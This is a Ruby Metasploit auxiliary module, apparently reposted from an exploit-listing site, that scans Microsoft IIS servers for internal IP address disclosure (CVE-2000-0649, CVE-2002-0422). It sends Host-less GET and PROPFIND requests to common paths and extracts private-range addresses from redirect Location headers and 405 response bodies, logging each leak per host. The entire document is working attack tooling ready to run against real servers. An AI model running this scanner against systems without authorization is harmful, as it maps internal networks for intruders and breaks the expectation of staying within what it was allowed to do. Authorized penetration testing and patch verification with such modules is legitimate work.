## https://sploitus.com/exploit?id=PACKETSTORM:181126
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
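class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  # Paths that IIS commonly answers with a redirect (and therefore a Location
  # header built from the server's own address when no Host header is sent).
  TARGET_URIS = ['/', '/images', '/default.htm'].freeze

  # PROPFIND is included because some IIS versions echo the internal address in
  # the 405 Method Not Allowed body it produces.
  HTTP_METHODS = %w[GET PROPFIND].freeze

  # Seconds to wait for each response.
  RESPONSE_TIMEOUT = 25

  # RFC 1918 private ranges: 10/8, 172.16/12 and 192.168/16. The third and
  # fourth octets are matched loosely; the 172 second octet is restricted to
  # 16-31 so public 172.x.x.x addresses are not reported as internal.
  INTERNAL_IP_REGEX = /
    192\.168\.[0-9]{1,3}\.[0-9]{1,3}
    |10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}
    |172\.(?:1[6-9]|2[0-9]|3[01])\.[0-9]{1,3}\.[0-9]{1,3}
  /x.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft IIS HTTP Internal IP Disclosure',
        'Description' => %q{
          Collect any leaked internal IPs by requesting commonly redirected locations from IIS.
          CVE-2000-0649 references IIS 5.1 (win2k, XP) and older. However, in newer servers
          such as IIS 7+, this occurs when the alternateHostName is not set or misconfigured. Also
          collects internal IPs leaked from the PROPFIND method in certain IIS versions.
        },
        'Author' => [
          'Heather Pilkington',
          'Matthew Dunn - k0pak4'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2000-0649'],
          ['CVE', '2002-0422'],
          ['BID', '1499'],
          ['EDB', '20096'],
          ['URL', 'https://support.microsoft.com/en-us/help/218180/internet-information-server-returns-ip-address-in-http-header-content'], # iis 4,5,5.1
          ['URL', 'https://support.microsoft.com/en-us/topic/fix-the-internal-ip-address-of-an-iis-7-0-server-is-revealed-if-an-http-request-that-does-not-have-a-host-header-or-has-a-null-host-header-is-sent-to-the-server-c493e9bc-dfd3-0d9b-941c-b2d93a957d9e'], # iis 7+
          ['URL', 'https://techcommunity.microsoft.com/t5/iis-support-blog/iis-web-servers-running-in-windows-azure-may-reveal-their/ba-p/826500']
        ]
      )
    )
  end

  # Probe every URI/method pair on the host and record each leaked private IP.
  #
  # A note is only reported when at least one candidate address was found; a
  # response without a candidate (or no response at all) is skipped instead of
  # storing a nil `data` value.
  #
  # @param target_host [String] the host currently being scanned
  # @return [void]
  def run_host(target_host)
    # VHOST does not change per request, so describe it once.
    vhost_status = datastore['VHOST'].blank? ? '' : " against #{vhost}"

    TARGET_URIS.each do |uri|
      vprint_status("#{peer} - Requesting #{uri}#{vhost_status}")

      HTTP_METHODS.each do |method|
        res = send_hostless_request(uri, method)
        if res.nil?
          print_error("no response for #{target_host}")
          next
        end

        leaked = internal_ips_for(res)
        next if leaked.empty?

        print_good("Result for #{target_host}#{uri} with method #{method}. Found Internal IP: #{leaked.first}")
        report_note({
          host: target_host,
          port: rport,
          proto: 'tcp',
          sname: (ssl ? 'https' : 'http'),
          type: 'iis.ip',
          data: leaked.first
        })
      end
    end
  end

  private

  # Send a single request with an empty Host header and return the response,
  # or nil when none arrived.
  #
  # send_recv() is used instead of send_request_cgi() so the mixin does not add
  # its own Host header. The connection is closed in all cases, including when
  # the request raises, so a multi-URI scan does not leave sockets open.
  #
  # @param uri [String] request path
  # @param method [String] HTTP method
  # @return [Rex::Proto::Http::Response, nil]
  def send_hostless_request(uri, method)
    c = connect
    request = c.request_cgi(
      'uri' => uri,
      'method' => method,
      'headers' => { 'Host' => '' }
    )
    c.send_recv(request, RESPONSE_TIMEOUT)
  ensure
    disconnect(c) if c
  end

  # Extract unique private-range IP candidates from a response.
  #
  # 301-309: the Location header is inspected (a missing header yields no
  #          candidates rather than raising).
  # 405:     the response body is inspected (PROPFIND on some IIS versions).
  # Any other status produces no candidates.
  #
  # @param res [Rex::Proto::Http::Response]
  # @return [Array<String>] possibly empty, never nil
  def internal_ips_for(res)
    if (301..309).cover?(res.code)
      location = res.headers['Location'].to_s
      vprint_good("Location Header: #{location}")
      location.scan(INTERNAL_IP_REGEX).uniq
    elsif res.code == 405
      res.body.to_s.scan(INTERNAL_IP_REGEX).uniq
    else
      []
    end
  end
end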